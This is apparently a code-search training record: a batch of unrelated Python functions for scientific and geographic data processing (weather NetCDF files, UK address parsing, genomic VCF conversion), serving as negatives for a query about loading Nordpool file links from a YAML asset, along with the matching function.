Ensure this works for g5nr data too.\n #import pdb ; pdb.set_trace()\n if isinstance(slab, np.ma.masked_array):\n missingIdc = np.where(slab.mask == True)\n else:\n missingIdc = np.where(slab[:] == var.missing_value)\n slab[missingIdc] = NPS_INT_MISSING_VALUE\n # Set xlvl and outName (if necessary) according to levType\n if levType in ('sm', 'st'):\n # soil moisture/temperature level - need to change \n # outName according to depth range\n # This only works for LIS, AFAIK\n xlvl = 200100.000000\n thicknesses = rootgrp.getncattr('SOIL_LAYER_THICKNESSES')\n thicknesses = [ v.round() for v in thicknesses ]\n if thicknesses != ASSUMED_SOIL_THICKNESSES:\n log.warn(\"Unexpected thicknesses: {},{},{},{}\"\n .format(thicknesses))\n curr_end_depth = curr_start_depth + thicknesses[levCtr]\n pfx = levType.upper()\n log.info(\"Overriding variable name for soil moist./temp.\")\n outName = nps_utils.get_nps_soil_field_name(\n pfx, int(curr_start_depth), int(curr_end_depth) )\n log.info(\"Overriding description for soil moist./temp.\")\n description = nps_utils.get_nps_soil_field_description(\n pfx, int(curr_start_depth), int(curr_end_depth) )\n curr_start_depth = curr_end_depth\n elif levType == 'ps':\n # pressure level meteorological variable \n #xlvl = rootgrp_lev_types[levType].levIdx\n msg = \"Just putting indices for 'lev' ala NPS.\"\n if not msg in __already_logged:\n log.warn(msg)\n __already_logged.append(msg)\n xlvl = levCtr + 1 # fortran\n else:\n raise Exception(\"Unknown height/level dimension type\")\n \n altOutFile = _get_alt_out_file_path(createIndividualFiles, \n os.path.dirname(outFile),\n outName, xlvl, date)\n \n write_slab_cyl(slab, outFile, hdate, xfcst, source,\n outName, out_units, description, xlvl, \n lat_var[0], lon_var[0], deltalat, deltalon, \n altOutFile=altOutFile)",
"def nodal_development_area_etl():\r\n with arcetl.ArcETL(\"Nodal Development Areas\") as etl:\r\n etl.extract(dataset.NODAL_DEVELOPMENT_AREA.path(\"maint\"))\r\n etl.transform(\r\n arcetl.features.dissolve,\r\n dissolve_field_names=dataset.NODAL_DEVELOPMENT_AREA.field_names,\r\n tolerance=TOLERANCE[\"xy\"],\r\n )\r\n etl.load(dataset.NODAL_DEVELOPMENT_AREA.path(\"pub\"))",
"def get_nuts_codes():\n\n with open(GEOCODES_FILE) as stream:\n lines = csv.DictReader(stream)\n geocodes = []\n for i, line in enumerate(lines):\n # The first line has an empty NUTS-code\n if i > 0:\n geocode = line['NUTS-Code']\n geocodes.append(geocode)\n\n logging.debug('Loaded %d NUTS geocodes', len(geocodes))\n return tuple(geocodes)",
"def province_fetch(self):\n\n url = 'https://raw.githubusercontent.com/J535D165/CoronaWatchNL/master/data/rivm_NL_covid19_province.csv'\n\n logger.debug('Fetching Netherland province-level confirmed data from NLD_CW')\n\n return pd.read_csv(url)",
"def vcf2snapp(vcf_file, output_file):\r\n\r\n fh = open(vcf_file)\r\n\r\n chroms = []\r\n\r\n for line in fh:\r\n\r\n # Skip header\r\n if line.startswith(\"##\"):\r\n pass\r\n elif line.startswith(\"#CHROM\"):\r\n # Get taxa information\r\n taxa_list = line.strip().split()\r\n nexus_data = OrderedDict((x, []) for x in taxa_list[9:])\r\n elif line.strip() != \"\":\r\n fields = line.strip().split()\r\n\r\n ref_snp = fields[3]\r\n alt_snp = fields[4]\r\n\r\n # If SNP is not bialleic, ignore\r\n if len(alt_snp) > 1:\r\n continue\r\n\r\n # Record data for each Taxon\r\n for tx in nexus_data:\r\n # Get genotype\r\n gen = fields[taxa_list.index(tx)]\r\n gen = gen.split(\":\")[0]\r\n\r\n if gen == \"./.\":\r\n nexus_data[tx].append(\"-\")\r\n elif gen == \"0/0\":\r\n nexus_data[tx].append(\"0\")\r\n elif gen == \"1/1\":\r\n nexus_data[tx].append(\"2\")\r\n elif gen == \"1/0\" or gen == \"0/1\":\r\n nexus_data[tx].append(\"1\")\r\n\r\n\r\n # Write nexus files\r\n nexus_fh = open(output_file, \"w\")\r\n\r\n # Write header\r\n ntaxa = len(nexus_data)\r\n nloci = len(nexus_data[tx])\r\n nexus_fh.write(\"#NEXUS\\nBEGIN Data;\\n\\tDIMENSIONS NTAX={} NCHAR={};\\n\\t\"\r\n r'FORMAT DATATYPE=standard SYMBOLS=\"012\" INTERLEAVE=no missing=-;'\r\n \"\\n\"\r\n \"Matrix\\n\".format(ntaxa, nloci))\r\n\r\n # Write Data\r\n for tx in nexus_data:\r\n nexus_fh.write(\"{}\\t{}\\n\".format(tx, \"\".join(nexus_data[tx])))\r\n\r\n # Write file ending\r\n nexus_fh.write(\";\\nEND;\\n\")\r\n nexus_fh.close()",
"def regrid_process_based_field_to_12x12km():\n from sparse2spatial.ancillaries2grid import regrid_ds_field2G5NR_res\n # Load data\n data_root = utils.get_file_locations('data_root')\n folder = '/{}/../Oi/UEA/'.format(data_root)\n filename = 'iodide_from_model_ALL_interp.nc'\n ds = xr.open_dataset(folder+filename)\n filename2save = 'iodide_from_model_ALL_interp_0.125x0.125'\n regrid_ds_field2G5NR_res(ds, folder2save=folder, save2netCDF=True,\n filename2save=filename2save)",
"def read_ncep(ncdf_path,year):\r\n\r\n # path to the netcdf files\r\n ncdf_AT_file = os.path.join(ncdf_path,'.'.join(['air','{:0>4}'.format(year),'nc']))\r\n ncdf_GH_file = os.path.join(ncdf_path,'.'.join(['hgt','{:0>4}'.format(year),'nc']))\r\n ncdf_SH_file = os.path.join(ncdf_path,'.'.join(['shum','{:0>4}'.format(year),'nc']))\r\n\r\n print('Read global',year,'NCEP data ...')\r\n # Air Temperature\r\n DATA = read_data(netCDF4.Dataset(ncdf_AT_file,'r'), ['air'])\r\n if len(DATA['air']) < 17:\r\n print('Need 17 levels of AT data: found only ',len(lev_AT))\r\n\r\n # Specific Humidity\r\n SHUM_DATA = read_data(netCDF4.Dataset(ncdf_SH_file,'r'), ['shum'])\r\n if len(SHUM_DATA['level']) < 8:\r\n print('Need 8 levels of SH data: found only ',len(lev_SH))\r\n\r\n if list(SHUM_DATA['level'])!=list(DATA['level'][:len(SHUM_DATA['level'])]):\r\n print('Warning: air and shum do not share the same lower pressure levels')\r\n\r\n DATA.update(SHUM_DATA)\r\n\r\n # Geopotential Height\r\n GH_DATA = read_data(netCDF4.Dataset(ncdf_GH_file,'r'), ['hgt'])\r\n if len(GH_DATA['level']) < 17:\r\n print('Need 17 levels of GH data: found only ',len(lev_GH))\r\n\r\n DATA.update(GH_DATA)\r\n\r\n for key in DATA:\r\n if 'air' in key:\r\n DATA[key.replace('air','T')] = DATA[key]\r\n del DATA[key]\r\n if 'hgt' in key:\r\n DATA[key.replace('hgt','H')] = DATA[key]\r\n del DATA[key]\r\n if 'shum' in key:\r\n DATA[key.replace('shum','QV')] = DATA[key]\r\n del DATA[key]\r\n\r\n DATA['lev'] = DATA['level']\r\n del DATA['level']\r\n\r\n return DATA",
"def parse_nids(self, nids):\n r = self.experiment.r\n if nids == None:\n nids = sorted(r.n) # use active neurons\n elif nids == 'quiet':\n nids = sorted(r.qn) # use quiet neurons\n elif nids == 'all':\n nids = sorted(r.alln) # use all neurons\n else:\n nids = tolist(nids) # use specified nids\n neurons = [ r.alln[nid] if nid in r.alln else None for nid in nids ]\n return nids, neurons",
"def NATL60state(n_ens=1):\n\n # Initial SSH field file name\n file_name_init_SSH_field='NATL60OSMO-CJM165_y2012m06d14-y2013m10d01.1d_SSHdegrad.nc'\n # Initial SSH field path\n path_init_SSH_field='/Users/sammymetref/Documents/Boost-Swot/Notebooks/GitHub/Personal_Files/2018/Data/OSMOSIS/'+file_name_init_SSH_field\n\n\n if n_ens>1:\n print('Warning: NATL60state only works for one-member-ensemble') \n fid = nc.Dataset(path_init_SSH_field)\n lon=np.array(fid.variables[\"nav_lon\"][:])\n lat=np.array(fid.variables[\"nav_lat\"][:]) \n multiplefields=np.array(fid.variables[\"degraded_sossheig\"][:,:]) \n \n state_vectors0_names='TMP_DA/state_vectors0.nc'\n ncout = nc.Dataset(state_vectors0_names, 'w', format='NETCDF3_CLASSIC')\n ncout.createDimension('x', lon.shape[0])\n ncout.createDimension('y', lat.shape[1])\n ncout.createDimension('member', n_ens)\n ncens = ncout.createVariable('ens', 'd', ('member',)) \n nclon = ncout.createVariable('nav_lon', 'f', ('x','y',))\n nclat = ncout.createVariable('nav_lat', 'f', ('x','y',)) \n nclat[:,:] = lat \n nclon[:,:] = lon \n nchei = ncout.createVariable('degraded_sossheig', 'f', ('member','x','y',))\n ncens[:] = range(n_ens) \n for i_ens in range(n_ens): \n nchei[i_ens,:,:] = multiplefields[0,:,:] \n ncout.close()\n \n \n return state_vectors0_names",
"def _prove_NNE() -> Proof:\n # Optional Task 6.7b\n lines = [None] * 8\n lines[0] = Proof.Line(Formula.parse(\"~~p\"))\n lines[1] = Proof.Line(Formula.parse(\"(~~p->(~~~~p->~~p))\"), I1, [])\n lines[2] = Proof.Line(Formula.parse(\"(~~~~p->~~p)\"), MP, [0, 1])\n lines[3] = Proof.Line(Formula.parse(\"((~~~~p->~~p)->(~p->~~~p))\"), N, [])\n lines[4] = Proof.Line(Formula.parse(\"(~p->~~~p)\"), MP, [2, 3])\n lines[5] = Proof.Line(Formula.parse(\"((~p->~~~p)->(~~p->p))\"), N, [])\n lines[6] = Proof.Line(Formula.parse(\"(~~p->p)\"), MP, [4, 5])\n lines[7] = Proof.Line(Formula.parse(\"p\"), MP, [0, 6])\n\n p = Proof(InferenceRule([Formula.parse('~~p')], Formula.parse('p')),\n {MP, I0, I1, D, N}, lines)\n return remove_assumption(p)",
"def read_coordinates_nis():\n\n initN_df=pd.read_csv(os.path.join(data_path, 'interim/demographic/initN_arrond.csv'))\n NIS = initN_df.NIS.values\n\n return NIS",
"def _parser_postprocessing(data):\n # if valid postcode information found then split between in and outcode\n if data['Postcode'].count() > 0:\n postcodes = data['Postcode'].str.split(' ', expand=True)\n postcodes.rename(columns={0: 'postcode_in', 1: 'postcode_out'}, inplace=True)\n data = pd.concat([data, postcodes], axis=1)\n else:\n data['postcode_in'] = None\n data['postcode_out'] = None\n\n # data containers for those components not parsed, but derived during post-processing\n data['PAOstartNumber'] = None\n data['PAOendNumber'] = None\n data['PAOstartSuffix'] = None\n data['PAOendSuffix'] = None\n data['SAOStartNumber'] = None\n data['SAOEndNumber'] = None\n data['SAOStartSuffix'] = None\n data['SAOEndSuffix'] = None\n\n # if building number is present, then copy it to start number\n data['PAOstartNumber'] = data['BuildingNumber'].copy()\n\n # in some other cases / is in the BuildingName field - now this separates the building and flat\n # the first part refers to the building number and the second to the flat\n tmp = r'(\\d+)\\/(\\d+)'\n msk = data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[1]\n\n # some cases the SAO components end up in the organisation name field, need to be separated\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['OrganisationName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'OrganisationName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n\n # some cases the SAO components end up in the organisation name field, need to be separated\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['OrganisationName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'OrganisationName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n\n # sometimes both PAO and SAO range is in the BuildingName e.g. 
\"35A-35D 35A-35F\"\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z]).*?(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[4]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[5]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[6]\n data.loc[msk & data['PAOendSuffix'].isnull(), 'PAOendSuffix'] = extracted_components[7]\n\n # sometimes both PAO and SAO range is in the BuildingName e.g. \"28A-28F PICCADILLY COURT 457-463\"\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z]).*?(\\d+)-(\\d+)'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[4]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[5]\n\n # sometimes both PAO and SAO range is in the BuildingName e.g. \"3-3A CHURCHILL COURT 112-144\"\n tmp = r'(\\d+)-(\\d+)([A-Z]).*?(\\d+)-(\\d+)'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[3]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[4]\n\n # sometimes both building number and flat range are stored in BuildingName (e.g. 
9B-9C 65A), separate these\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])\\s.*?(\\d+)([A-Z])'\n msk = data['BuildingNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[4]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[5]\n\n # if building number is not present, try to extract from building name if appropriate type\n # deal with cases where buildingName contains a suffix range: 24D-24E\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[1]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[2]\n data.loc[msk & data['PAOendSuffix'].isnull(), 'PAOendSuffix'] = extracted_components[3]\n # deal with cases where buildingName contains a suffix range: 24-24E\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[1]\n data.loc[msk & data['PAOendSuffix'].isnull(), 'PAOendSuffix'] = extracted_components[2]\n # deal with cases where buildingName is a range: 120-122\n tmp = r'(\\d+)-(\\d+)'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOendNumber'].isnull(), 'PAOendNumber'] = extracted_components[1]\n # deal with cases where buildingName is 54A or 65B but not part of a range e.g. 65A-65B\n tmp = r'(?<!-|\\d)(\\d+)([A-Z])(?!-)'\n msk = data['PAOstartNumber'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['PAOstartNumber'].isnull(), 'PAOstartNumber'] = extracted_components[0]\n data.loc[msk & data['PAOstartSuffix'].isnull(), 'PAOstartSuffix'] = extracted_components[1]\n\n # if building start number is present, then add to SAO\n # sometimes subBuildingName contains the flat range e.g. 
14E-14E extract the components\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n\n # sometimes subBuildingName contains the flat range e.g. 14-14E extract the components\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n\n # sometimes subBuildingName is e.g. C2 where to number refers to the flat number\n tmp = r'([A-Z])(\\d+)'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[1]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[0]\n\n # deal with cases where buildingName contains a suffix range: 24D-24E\n tmp = r'(\\d+)([A-Z])-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].notnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOStartSuffix'].isnull(), 'SAOStartSuffix'] = extracted_components[1]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[2]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[3]\n\n # deal with cases where buildingName contains a suffix range: 24-24E\n tmp = r'(\\d+)-(\\d+)([A-Z])'\n msk = data['PAOstartNumber'].notnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SAOStartNumber'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SAOEndNumber'] = extracted_components[1]\n data.loc[msk & data['SAOEndSuffix'].isnull(), 'SAOEndSuffix'] = extracted_components[2]\n\n # some addresses have / as the separator for buildings and flats, when matching against NLP, needs \"FLAT\"\n msk = data['SubBuildingName'].str.contains('\\d+\\/\\d+', na=False, case=False)\n data.loc[msk, 'SubBuildingName'] = 'FLAT ' + data.loc[msk, 'SubBuildingName']\n\n # if SubBuildingName is empty, but BuildingName contains Block [A-Z], place this string to SubBuildingName\n tmp = r'(BLOCK [A-Z])'\n msk = data['SubBuildingName'].isnull() & data['BuildingName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'BuildingName'].str.extract(tmp)\n if len(extracted_components.index) > 0:\n data.loc[msk, 'SubBuildingName'] = extracted_components.values\n\n # deal with addresses that are of type 5/7 4 whatever road, the format 
assumed start/end_sao_numb pao_start_numb\n tmp = r'(\\d+)\\/(\\d+)'\n msk = data['SubBuildingName'].str.contains(tmp, na=False, case=False) & \\\n data['SAOStartNumber'].isnull() & data['BuildingNumber'].notnull()\n extracted_components = data.loc[msk, 'SubBuildingName'].str.extract(tmp)\n data.loc[msk & data['SAOStartNumber'].isnull(), 'SubBuildingName'] = extracted_components[0]\n data.loc[msk & data['SAOEndNumber'].isnull(), 'SubBuildingName'] = extracted_components[1]\n\n # if SubBuildingName contains only numbers, then place also to the sao start number field as likely to be flat\n msk = data['SubBuildingName'].str.isnumeric() & data['SAOStartNumber'].isnull()\n msk[msk.isnull()] = False\n data.loc[msk, 'SAOStartNumber'] = data.loc[msk, 'SubBuildingName']\n\n # if street name contains a number and buildingnumber is empty, then place it there and pao_start_number\n tmp = r'(\\d+)'\n msk = data['BuildingNumber'].isnull() & data['StreetName'].str.contains(tmp, na=False, case=False)\n extracted_components = data.loc[msk, 'StreetName'].str.extract(tmp)\n if len(extracted_components.index) > 0:\n data.loc[msk, 'BuildingNumber'] = extracted_components.values\n data.loc[msk, 'PAOstartNumber'] = extracted_components.values\n\n # split flat or apartment number as separate for numerical comparison - compare e.g. SAO number\n # todo: rewrite\n msk = data['SubBuildingName'].str.contains('flat|apartment|unit', na=False, case=False)\n data.loc[msk, 'SAOStartNumber'] = data.loc[msk, 'SubBuildingName']\n data.loc[msk, 'SAOStartNumber'] = \\\n data.loc[msk].apply(lambda x: x['SAOStartNumber'].strip().\n replace('FLAT', '').replace('APARTMENT', '').replace('UNIT', ''),\n axis=1)\n\n return data",
"def go_get_data(postcodes,dataset,pathToData=''):\n results = []\n geoAreas = []\n for postcode in postcodes:\n pc = adjustpostcode(postcode)\n pathToData = ''\n conn = lite.connect(pathToData+'geo.db')\n geodb = conn.cursor() \n c_oa = geodb.execute(\"SELECT oa11, lat, long FROM geo WHERE pcd=?;\",(pc,));\n oa = None;\n for r in c_oa:\n results.append({'oa':str(r[0]),'lat':r[1],'lon':r[2],'postcode':postcode})\n geoAreas.append(str(r[0]))\n\n geoAreaslist = ','.join(geoAreas) \n #QS414EW\n #url = \"http://web.ons.gov.uk/ons/api/data/dataset/QS102EW.xml?context=Census&apikey=cHkIiioOQX&geog=2011STATH&diff=&totals=false&dm/2011STATH=%s\" % geoAreaslist\n url = \"http://web.ons.gov.uk/ons/api/data/dataset/%s.xml?context=Census&apikey=cHkIiioOQX&geog=2011STATH&diff=&totals=false&dm/2011STATH=%s\" % (dataset,geoAreaslist)\n response = urllib2.urlopen(url)\n xmlstring = response.read();\n xmlstring = re.sub('(xmlns:[^=]*)=\"[^\"]*\"', '\\\\1=\"_\"', xmlstring)\n root = ET.fromstring(xmlstring);\n \n data_results = {}\n for a in root.findall(\"{_}genericData/{_}DataSet/{_}Group/{_}Series\"):\n loc = a.find(\"{_}SeriesKey/{_}Value[@concept='Location']\")\n if loc is None: \n continue\n location_string = loc.attrib['value']\n if location_string not in data_results:\n data_results[location_string] = []\n for dp in a.findall(\"{_}Obs/{_}ObsValue\"):\n data_string = dp.attrib['value']\n data_results[location_string].append( float(data_string) )\n \n for res in results:\n for i,d in enumerate(data_results[res['oa']]):\n res[dataset+\"_%d\" % i] = d\n #res[dataset] = data_results[res['oa']]\n return results",
"def _calculate_voronoi(self):\n centroids = [node.location() for node in self]\n vor = Voronoi(centroids)\n self._voronoi = (centroids, vor, voronoi_finite_polygons(vor))",
"def nyt_cases_counties(df):\n # Cast date as datetime\n df['date'] = pd.to_datetime(df['date'])\n # Drop records with county = 'Unknown' or no FIPs code\n df = df.loc[(df['county'] != 'Unknown') & (df['fips'].notnull())].copy()\n # Store FIPS codes as standard 5 digit strings\n df['fips'] = _fips_cleaner(df['fips'])\n # Drop FIPs that are not part of US states, cast deaths to int\n df = df.loc[df['fips'].str.slice(0,2) <= '56'].copy()\n df['deaths'] = df['deaths'].astype(int)\n return df",
"def nodata(self):\n return self._nodata",
"def parse(self, data, normalised_field_name='ADDRESS_norm'):\n self.log.info('Start parsing address data...')\n\n data = self._normalize_input_data(data, normalised_field_name=normalised_field_name)\n\n addresses = data[normalised_field_name].values\n self.log.info('{} addresses to parse...'.format(len(addresses)))\n\n # temp data storage lists\n organisation = []\n department = []\n sub_building = []\n building_name = []\n building_number = []\n street = []\n locality = []\n town = []\n postcode = []\n\n # loop over addresses and use the probabilistic parser to tag the address components - should avoid a loop\n for address in tqdm(addresses):\n parsed = parser.tag(address.upper())\n possible_postcode = self._extract_postcode(address) # regular expression extraction\n\n # if both parsers found postcode then check that they are the same\n if parsed.get('Postcode', None) is not None and possible_postcode is not None:\n if parsed['Postcode'] != possible_postcode:\n # not the same, use possible_postcode\n parsed['Postcode'] = possible_postcode\n\n # if the probabilistic parser did not find postcode but regular expression did, then use that\n if parsed.get('Postcode', None) is None and possible_postcode is not None:\n parsed['Postcode'] = possible_postcode\n\n if parsed.get('Postcode', None) is not None:\n # check that there is space, if not then add if the parsed postcode is long enough to contain a complete\n # postcode. Some users have partial postcodes to which one should not add a space.\n if ' ' not in parsed['Postcode'] and len(parsed['Postcode']) > 4:\n in_code = parsed['Postcode'][-3:]\n out_code = parsed['Postcode'].replace(in_code, '')\n parsed['Postcode'] = out_code + ' ' + in_code\n\n # change to all capitals\n parsed['Postcode'] = parsed['Postcode'].upper()\n\n # if Hackney etc. in StreetName then remove and move to locality if town name contains London\n # Probabilistic parser should see more cases with london localities, parsed incorrectly at the mo\n if parsed.get('StreetName', None) is not None and parsed.get('TownName', None) is not None:\n if 'LONDON' in parsed['TownName']:\n parsed = self._fix_london_boroughs(parsed, os.path.join(self.currentDirectory, '../../data/'))\n\n # sometimes building number gets placed at building name, take it and add to building name\n if parsed.get('BuildingNumber', None) is None and parsed.get('BuildingName', None) is not None:\n tmp = parsed['BuildingName'].split(' ')\n if len(tmp) > 1:\n try:\n _ = int(tmp[0])\n parsed['BuildingNumber'] = tmp[0]\n except ValueError:\n pass\n\n # some addresses contain place CO place, where the CO is not part of the actual name - remove these\n # same is true for IN e.g. 
Road Marton IN Cleveland\n if parsed.get('Locality', None) is not None:\n if parsed['Locality'].strip().endswith(' CO'):\n parsed['Locality'] = parsed['Locality'].replace(' CO', '')\n if parsed['Locality'].strip().endswith(' IN'):\n parsed['Locality'] = parsed['Locality'].replace(' IN', '')\n\n # parser sometimes places house to organisation name, while it is likelier that it should be subBuilding\n if parsed.get('OrganisationName') == 'HOUSE' and parsed.get('SubBuildingName', None) is None:\n parsed['SubBuildingName'] = parsed.get('OrganisationName')\n\n # store the parsed information to separate lists\n organisation.append(parsed.get('OrganisationName', None))\n department.append(parsed.get('DepartmentName', None))\n sub_building.append(parsed.get('SubBuildingName', None))\n building_name.append(parsed.get('BuildingName', None))\n building_number.append(parsed.get('BuildingNumber', None))\n street.append(parsed.get('StreetName', None))\n locality.append(parsed.get('Locality', None))\n town.append(parsed.get('TownName', None))\n postcode.append(parsed.get('Postcode', None))\n\n # add the parsed information to the dataframe\n data['OrganisationName'] = organisation\n data['DepartmentName'] = department\n data['SubBuildingName'] = sub_building\n data['BuildingName'] = building_name\n data['BuildingNumber'] = building_number\n data['StreetName'] = street\n data['Locality'] = locality\n data['TownName'] = town\n data['Postcode'] = postcode\n data['PAOText'] = data['BuildingName'].copy()\n data['SAOText'] = data['SubBuildingName'].copy()\n\n data = self._parser_postprocessing(data)\n\n return data",
"def getPostCodeMapping():\n postcode_mapping = {\n \"110031v\" : \"110031\", #removed the extra v in the end\n \"2242\" : \"122001\", # manually scanned the OSM file for pincode for same place\n \"10089\" : \"110085\", #checked manually on internet\n \"1100002\" : \"110002\",\n \"1100049\" : \"110049\",\n \"2010\" : \"201010\",\n \"1100016\" : \"110016\"\n }\n return postcode_mapping"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Load the list of file links from assets/nordpool_files.yml.
|
def _load_nordpool_links() -> List[str]:
data = yaml.safe_load(pkgutil.get_data(__name__, "assets/nordpool_files.yml"))
return data.get('files', [])
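
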